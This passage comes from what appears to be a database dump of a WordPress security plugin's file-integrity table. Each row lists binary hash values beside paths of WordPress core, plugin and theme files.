㋫x�o','�>��Cv^��/�V����r��cCƨK(��P��','',0,'?'),('���9�X����U�7�z','wp-content/plugins/wordfence/models/page/wfPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�bo i�%H��Xw�Xv','ƅ1h�/jw�<U���\\�k�q%s|W�6��','',0,'?'),('��і�q��SGKy(�','wp-includes/kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�&�����ھ�\Z','v��<���	�0��t�\r��u�����^L�','',0,'?'),('�9��l�ן? r��q�','wp-includes/class-wp-user-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�Iyʰ�BzR��>�O','�gu,�$�bh�/7��C�<�l=��0x�3�x','',0,'?'),('�%��?���)�','wp-content/plugins/wordfence/views/common/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!z������̥','+���A�S��џbH��濳�$�V�+��N΂�','',0,'?'),('�DS���3.įy}�;','wp-admin/images/browser-rtl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\"��ӠA�\Z����%̝','+啧���0��p�Ɯ��JMk �q�w�Xب�','',0,'?'),('�[�Hn[P�.~���FU|','wp-includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��~H���;���',':X��ץ�D�W�G��IV�x(��Yƣ��','',0,'?'),('�j��\\��Ħ<y�p�','wp-includes/widgets/class-wp-widget-custom-html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۼ���P�L20��&�','l)�V�\'B\0�:�����hֵf�;\0<Ń��½','',0,'?'),('�t��.!h�t�%h��','wp-includes/blocks/video/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','人�ejqpu�Kq','�3��6�=����[��E3�����M��,�-','',0,'?'),('����Z�\Zxcy�d��\'','wp-admin/js/language-chooser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U>�p4J�l��5�=','9���\rX�L�dC5@U���K&>̓l��#�','',0,'?'),('���-�4u��\Zo�','wp-content/plugins/wp-cerber/assets/flags/ye.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t?H&��@\r\r�J�','�~��p��\"&qƝq�*��۔�QV��Y�\\F','',0,'?'),('��2���s��k��','wp-includes/blocks/categories/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���\'y���ª�','+��vy^dU���1vv�t����+$b�:�','',0,'?'),('���%���\\(w����&','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I\0��$K��  �	','V�p\Z�1͌э�\'=~�ٲ�F_u\\��P�','',0,'?'),('��G^�2G��%�k���','wp-content/plugins/wp-cerber/assets/flags/fr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('�����:x�=�}�','wp-includes/js/jquery/ui/mouse.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J�;��ty����','�G������[&�~ͤ�E3�	�z͟��ӱ�','',0,'?'),('��C)�VxzϞ�ΩtP','wp-content/plugins/wp-cerber/assets/flags/um.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�xQos:h�\0A�qY','�?85�ϝ��r�o�e��[UԦM��\\','',0,'?'),('��H�a�+����̰I�','wp-content/plugins/wordfence/waf/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^=��4�|��\'�\'�O','��w��=�M��q�a[����h<ǧ�\"�=��}�','',0,'?'),('��O�I��Y�\\�{=�H','wp-includes/robots-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\��líܓM��','^�h��R߻u�ɆCZ11��S���&̊p0','',0,'?'),('��y�&a�A�7�]Dm','wp-content/plugins/wordfence/images/icons/ajaxRed16.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%���B\ng�2��;','D,�A�J���lOS�p�e؇�&���','',0,'?'),('�ƞׅ\ZX�X]�Y�F','wp-includes/js/codemirror/htmlhint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�|џ�G�MtP5��','\0U[\0�M\'mCռ5��5k`����5�ё','',0,'?'),('�	ϛ��3Rc��Ϲ','wp-content/plugins/redirection/fileio/csv.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I���U����[��7�','��:����ӝf��G\02��K�;����C�\'�','',0,'?'),('� a\"KwT�bc1S','wp-admin/css/revisions.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǰW��{�jڛ/$��','��j	ELCo�!;u��:�蛜|�|/���3eom','',0,'?'),('�-�[ip��\\^���]','wp-includes/widgets/class-wp-widget-tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�q��th�̷L��','��s�F�f�<�5H��u�1�����8��mU','',0,'?'),('�0�&�Y�������','wp-content/plugins/wordfence/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('�2l�Ƴ;���-6�','wp-content/plugins/wp-cerber/modules/aaa-wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3W�T��\r�ط�18��','<�[�7�LĆ9�>gQ�:�56��bW�7��','',0,'?'),('�4g��e���>���ߝ','wp-admin/images/list-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hջIS�2��i�g�','��J�p�S_��X��#���UB�-z���,�','',0,'?'),('�;�f�J1��˘��+C','wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n\n��+ծ.jqAZ�','�\0��I������36���ěn�j7jk�:��','',0,'?'),('�OOwT�M\r��Y�!d','wp-includes/js/mediaelement/mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-6�������m����','���%�]�cط�Z���7�\n�ԋ���2���','',0,'?'),('�]ǿ|������IC�','wp-includes/js/dist/keycodes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�1/�-ly�{�2','!Ob��p�mT���ޯn�L�1�\Z���_�W�','',0,'?'),('�fkj��N�Uei4=%�','wp-admin/js/tags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���D�Xݲ�2Ug�','���9�k7qJ�3��B�l?W����؎��','',0,'?'),('�y%���Ǻ~�ne\"V','wp-admin/css/list-tables-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	u>0se#�hy�$��','��P��ુg_�\'*�Z0�Xp�2K70��[�','',0,'?'),('��\Zv\0��̀Fn8���','wp-content/plugins/wp-cerber/assets/flags/tm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�d&���&����/��','�p�DƱq��ߙcc����D�J�cT5@�U�v\n','',0,'?'),('���/�-�Tǻ�T<�S','wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NkyIk��wה�=i','LS=����Wf&�d\\=]_f�vesW���','',0,'?'),('���r���N(��M�\\','wp-includes/blocks/post-title/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4�̈~�3�vtSQ\'','�g�e��T����\'i\\��i��=>;�QBH\'D��','',0,'?'),('���ۖL�����.b','wp-content/plugins/wp-cerber/assets/icons/fonts/crb.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A`1�r�8{W�T7���',']���r���AۀBQ� ���NRy~2�M�/��','',0,'?'),('�1�o%��q�A��','wp-admin/js/inline-edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����1�/V`�n�BR�','�N�XL��1�YDr/�uXn���o���gd���','',0,'?'),('�TL �߈,]��զ�m�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�	�����:{��W��e','6{w���^Gk�Ϋ�25�b��\r��񓫄�','',0,'?'),('�m�H�:�M���*��^','wp-includes/css/dist/editor/editor-styles.css',0,'�iۘ\"���뱠��','�iۘ\"���뱠��','���by:��8�3��o�\Z������\"ڹ�','',0,'?'),('�z�h9��ꈦ��Xp�+','wp-content/plugins/wordfence/views/scanner/no-issues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xt-|�F������e�','��_?7���c���:_��@���E�J��s��[','',0,'?'),('��9�n����P,��A��','wp-content/plugins/wp-cerber/assets/flags/pm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��\'�)v\rC��','`&�k$\nuxd�sh��RZ�\r��� (�Qf�','',0,'?'),('����v���V5ǃ�D�u','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ�\n�1�h;!�','�Mϡ�	����p�k��)����!\r��','',0,'?'),('��E�S�c+��#�)','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�Nm�S���C��{�','���P~�{p��}x{�8�2�hX�x���','',0,'?'),('��F�����{��A','wp-content/plugins/wordfence/lib/sysinfo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{X�6��92����','G,��=����C\Z3���~f�(8��Ψ��@�,ї','',0,'?'),('��E���Q?��	(�','wp-includes/class-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j,;�\Z3�x���','��0�v�!�vv7�H�lV�d���i\'K�����','',0,'?'),('��Z/N�H@~a���?d�','wp-content/plugins/wordfence/css/wf-global.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ADmqc��v��d9','�(O��ӛˀԟMAW��D�0޳�\\��5LG�','',0,'?'),('�.݁B��xK�Y�','wp-includes/ms-default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�����n����','W�a�h\n�\0�8u�v���yv,N�����!�wh','',0,'?'),('��6����~e�{�\".w','wp-includes/widgets/class-wp-widget-recent-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�d�9@z�{�����','���i�P�_4��� ����,�~]��h{�pC','',0,'?'),('�*O-�Lτ���\r[�u','wp-admin/css/about-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<+᭚K���b��5�','���b�$,=~�+���-�\"�6�;�u)��|F:','',0,'?'),('�??n�����_2g��j','wp-includes/js/wp-util.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�Zl��.}L�{!aN)$','�	k���d���Yn*��IӒ�_,��2\0��','',0,'?'),('�Yg�$z�H�.Y��','wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(��`W�6�$�','fDYr��tt��}}}1�q/u|�����;�B','',0,'?'),('����m��ӟa����','wp-includes/blocks/post-featured-image/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�WW{���SR�ž7�',']c��rs��eD�$�$#8���0���(�','',0,'?'),('��\n��R�b��x���g','wp-includes/css/dist/block-library/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�C/��[�C�pmڠ�','���|ST�\Z����:9d�:�_s�|�=�AtlI','',0,'?'),('��Y�\0)\r/j�)�Ar','wp-includes/customize/class-wp-customize-filter-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��`f��\0�iu�','�\0<\n�j:��Y�F���d�w��	���','',0,'?'),('�P�h`|/���:W�\0','wp-includes/blocks/columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y+ZGl#�l��@���','0q|AI��iY�p��!�\r��.ߔ�2)��~a���','',0,'?'),('��DT\'{�_̤ؤP7','wp-content/plugins/wp-cerber/assets/flags/gf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('�$n1��U\\�x(�','wp-includes/blocks/missing/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���GN]ܫx|�7�','<kt����b���ĸW��#��X��n��BL�','',0,'?'),('�!���\"�-;4-?','wp-content/plugins/redirection/locale/json/redirection-lv.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʚ����Z��8ZPO�','�P����	\"�{��\\TD\Zx��*�D�p�','',0,'?'),('�$_���X��la�','wp-includes/js/jquery/ui/sortable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kX���E�EL�&�','F\0|\'��Lk8qp� �(����� v�}/5N![','',0,'?'),('�?	��W$j�P+)���','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-pl_PL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CSȋ�I�','	D�\Z\0�^�[t�a�q���HҼ�}����?','',0,'?'),('�E���F��Q�-5�','wp-content/plugins/redirection/locale/redirection-ja.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���T���P��DJ�','ơ!pM���oپپ�@������ɱ�;6��̼','',0,'?'),('�R;lzO�8m<3�Nie','wp-admin/user/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`���U�� }��\n�','�οzB�+q���5Vl�K�l��k���Z/��|','',0,'?'),('�afh=F���T�:��6�','wp-admin/includes/class-ftp-sockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�\"P����e<��3i','.\Z�D��-����ày!�����̕l��','',0,'?'),('�ik[!gW��}�v�ȵ','wp-includes/blocks/image/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�����~�����\\BJ�',';C���xe�0\Z\'��a�S�9�_\Z� Wn���','',0,'?'),('�����;~ӷR�>��','wp-includes/class.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�zrU[\nK��z��','s�d����� J�WL�+<�I���S4y$)T@','',0,'?'),('���nvp�e������}�','wp-admin/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bHa-M��%�1���','�j�	�&�I��\n�+?I���*�&󱩣]�a�','',0,'?'),('���D�Tǡ�#\"�1?�','wp-includes/blocks/cover/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�زxZ��j���ޅ�','��е�gdwI�Ŕ\nS22:x��oA��?	eG','',0,'?'),('��P���Z2�7�Mn��','wp-includes/blocks/rss/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{]ө��Z>�ﭒ��','d�Z�3��a�Hّ�2�\'t���\0L�\\[��i!Q','',0,'?'),('��ucZ��o��s�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-comment-spammer-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�p��=r���8ʗ�','�\\��Z���`\\@��*�Ǘ�o3B�&j\0','',0,'?'),('���*��h^������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n<Tfw��Y�_I���','e��\'#�\\�?����O-�U�L�]5�6��$','',0,'?'),('�� �\\���…�Tn��]','wp-includes/Requests/IDNAEncoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�G���}n(�Y��','/��<�E��=C��$�x��BHx��J�`Jw','',0,'?'),('���B\\u}�L�,���','wp-includes/css/dist/block-directory/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���X!�S���\\��h','!m�*�\r/�.��t�\r��n��$*|G�mn��Fr2','',0,'?'),('��\Z���3�H�{�Dz�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r� ���Ϭ�n+�n','^�q�N����Т��&yN�~�\'S//>}�p','',0,'?'),('�#:���Sk�U���{�','wp-content/plugins/wordfence/modules/login-security/classes/model/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�:�?��l]�����u','2P��탚��=w=��7Ar�\n�fQ��~,��B','',0,'?'),('�(�|n��sARF�+','wp-includes/js/crop/marqueeHoriz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̮����;���Lo\n','|���S�e��|.���/�Q�Y��W�}(','',0,'?'),('�[\'�/���;���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yP58��Ƣ����','��z3qS���T=�䞌HL<Y5A��#H','',0,'?'),('�c:Qk2�	 �6��','wp-includes/blocks/columns/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�PЊkA���Eð.��','z㱵@����@܎%���쐢��Q��S�','',0,'?'),('��>��$\'��i�','wp-content/plugins/redirection/locale/redirection-en_NZ.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\Ԫ`�>�W�l��B\0�',';�k\"���\"WXy���V0	RN�;�a0�w���x�','',0,'?'),('�����:[&b�[�hY��','wp-includes/images/smilies/icon_razz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9[�w���D�AM�A�',';���P�1]f�UE��;`Qڮ�\ne�Z\0@4�aA�','',0,'?'),('����L�7HnWE�DM�','wp-content/plugins/wp-cerber/assets/flags/sj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4�	\Z���rM�','',0,'?'),('���x2�_.�~$�)','wp-includes/js/dist/core-data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�܃�4X�j��IG��','L@BѠ�v��/�>OzK�g0�[cJ��9e\\ @','',0,'?'),('��$�tզ}�	�T','wp-includes/blocks/code/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����(�궲zhɶ',' ���6�r3����C9a�ْ�~ȝ���:�','',0,'?'),('�Ὀ����5f?�hk','wp-includes/widgets/class-wp-widget-media-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�P��/:���#�A','��P����!𴴨jz�F#�����d�ĚMP','',0,'?'),('����8`9��?Bb�Б','wp-includes/js/jquery/ui/effect-puff.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��5�����t�','`}��`�J)�$;��+�6K�C1R�&]C�i��','',0,'?'),('�\n��� ��/Y','wp-includes/js/dist/data-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�ϩV\0e�ռ�L�','T~�ź��?��f!LJlOU��2�t�W��','',0,'?'),('����5:|N}�E��','wp-content/themes/newsmagbd/vendors/magnific-popup/jquery.magnific-popup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[#��;jc�t�=�','�{Il�B|<�Ĩ�@Z\'�k)y��_E��Զ����','',0,'?'),('�+F�4�\n��q���\"]','wp-includes/blocks/table/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|�>��¾7�t�U','U�PS!��	\\��z\Z��Lruw�U�������','',0,'?'),('�D��?ļ�\n����','wp-content/plugins/wp-cerber/assets/flags/ml.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��hϸ-�1�՞��3','�A\0�]�ҕ#�:\r40�2��W�A%��)V\n','',0,'?'),('�a��.�j@��^��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-above-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<Qq��)@�M��J��','/�jo�z�y����@��z%9�&F%��[','',0,'?'),('�c�̎��$\n\'@�\r��','wp-admin/setup-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��V�l���ĿW��1�','y�{�0��,�N����oq�+��.I9I��t','',0,'?'),('�m֙7�,�}��ov','wp-includes/css/dist/block-library/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S����gX�5\Z��X�','/u��$���R�A\Zg`Y@���B72�9','',0,'?'),('���V��t�S�-��','wp-content/plugins/wordfence/views/scanner/issue-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KW?~���\rc��H','i�%>�\\6�L���{8������y�Z��AH�','',0,'?'),('���J1��M�F��<�','wp-admin/js/tags-box.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JA휪��M�Y�~= �u','��\"	0���\nt�M�\"��B�a�X�-J','',0,'?'),('��ÿ�d��71ң/3m�','wp-content/plugins/wordfence/css/wf-font-awesome.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��M��ً�V���:','997dI�Ou�-����%enԻ�1�����I','',0,'?'),('�����Ƅ���NB׭','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@8���s��A��','b�#�x��h�F4�_ �De���qeD��','',0,'?'),('���?ڟ�E���$PF','wp-includes/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C���*\Z�\'��',')��P��Š�ObxZ-dtWN��ǧ�~x�^Y��','',0,'?'),('���6��b�g�>_�','wp-includes/images/wlw/wp-watermark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��uMmܭD|�w���D','�S��nR�\'��X�^���kh����ɑ�i�7�','',0,'?'),('������8�j��c}�','wp-includes/blocks/rss/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XK��|�`�-���2\Z?','B�__����-��YtNY�7:�@4q�3�q�5���','',0,'?'),('�h�x�*(�&���kO�','wp-content/plugins/wordfence/views/blocking/country-block-map.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��yGF�,{��X�z','%Ԝ5��;�����x��^)���G(��o','',0,'?'),('�����\'K�z�f��','wp-includes/customize/class-wp-customize-header-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�$+��q?��U��','�9@mr�ܵ��\"+B���V�K.�uB\"�����','',0,'?'),('��5#�\"8�%`}','wp-content/wflogs/template.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('�	\n�6T���/���m','wp-content/plugins/wordfence/modules/login-security/css/admin-global.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n�!m]\'�x�_�','�W���I�Y��T�įQ�.0(?��F���f#|�M','',0,'?'),('�\r�f����h�8�!','wp-includes/Requests/Exception/HTTP/500.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I(vrMm�(�c\0{  \n','FO���V3\"���������!k�P�','',0,'?'),('���v9�b�$�L','wp-includes/random_compat/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X:,��t]7�=��Q��E','��,��t�\0_g�X%4.�tP�]�>�JT4','',0,'?'),('�#�?���Gc	¯l1e','wp-includes/class-wp-theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hl���6@�]aw��','�#�	M��鞥��a^s�\n\' �/,���\Z}?K','',0,'?'),('�H�����Pw��%8��','wp-includes/images/smilies/icon_sad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ix�o��TMz��D-','�b5�yh�9���}���o��W�I��n�n�','',0,'?'),('�I��Tݩ��~��7�','wp-content/plugins/wp-cerber/languages/wp-cerber-de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o9�����\nPG��,��','o�jY�F�J�q�AUS�*�D��.&�[P�.','',0,'?'),('�K�{�*�)�����','wp-content/plugins/all-in-one-wp-security-and-firewall/js/wp-security-admin-script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�@�c��<�W8DM','��wL�\rd�Ê��3��<\'\n�:&̉��$޲3$O','',0,'?'),('�Q49��Lz�J�','wp-content/plugins/wordfence/lib/wfUtils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','()p��|˜���s���T','���R��j�-y}��EHh\r�F�D�����BA�','',0,'?'),('�XX*��!2�~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eb:lx-�<��s99`','�,��{ m��Z��BV�TL�;*���<','',0,'?'),('�[�n�G{�\'��q:�','wp-includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������K��Mý','��{�\"�z�GW1ɓDĝ��U�͏�[���','',0,'?'),('�\\�h� R�X�<�C�','wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���߅�w@L��O�R','��EF�j���r�č;s��΀.f:��Ϥ�F','',0,'?'),('�c����6��~�6̐','wp-includes/blocks/button/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$S���ay�I�ʡ.$','�J_k������~	�\\���5����','',0,'?'),('�|W��<�|ƀJ��','wp-content/plugins/wp-cerber/assets/flags/cw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('����\Z7�8�-\\�~�','wp-includes/css/dist/edit-post/classic-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2q�s@*����','��h�GnT�f�}�u�Y�c�Ư���v�w�','',0,'?'),('��3_���[#�g`�','wp-includes/css/dist/block-library/reset-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^���<��U=���','׀���6`+���k\ZA��~W�9|�gR���v','',0,'?'),('��J�ח�_yzx�6O','wp-admin/network/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��>�H\r��5:�6�','*]X8���%�KқR	���Q�f�;\ne�\r�6\\','',0,'?'),('���Ȁ�~_q�I��S�','wp-admin/js/password-strength-meter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z��3�r�;]�<|�','����1��y吥!�}}�3ɻ}}�te\nt�','',0,'?'),('���\\�D �>�F,���','wp-admin/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N4\'8,�L�J	�I4x','� �b��}�gD4��X\\�ܰ�,IM�Z�p�','',0,'?'),('��	�\")�\"��0I�o��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��q\Zs��q776�','C�D�a�$�=�f[Q�4�JW�7l)�.�=%��','',0,'?'),('���ꔕTs�\r%�LJ�M','wp-includes/blocks/spacer/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z#Ů�{��N���p','z���UԣYKu@W#��+�0��N�`qX��\"L	','',0,'?'),('�������&Ż�(','wp-admin/js/widgets/custom-html-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��˧0�o�r�j�{�','<������\"W63�`�/p�0h���LH�MG1','',0,'?'),('��~+�q�X��\"`','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oaQ���|g�4&��','�c�U�X����+�]Wvd�=�,����Z0)\\�','',0,'?'),('�\\�`7O+�8�t�C��','wp-content/plugins/redirection/locale/json/redirection-zh_TW.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s\'gn5����%�86','�չI3�uS�w70�UԢ�%N<� i�Տ%��','',0,'?'),('��=CѠ��*TX�4','wp-admin/css/colors/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ր�]P�̍f��Vk�k�','�3}�c9j�my�����@s��p�VR�9Z','',0,'?'),('��ڷt�g�Z�gE�','wp-includes/class-wp-http-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4��y�K���ߕ','�Ι	��[�{\0If�\0�t��v\n9d����x��','',0,'?'),('�� 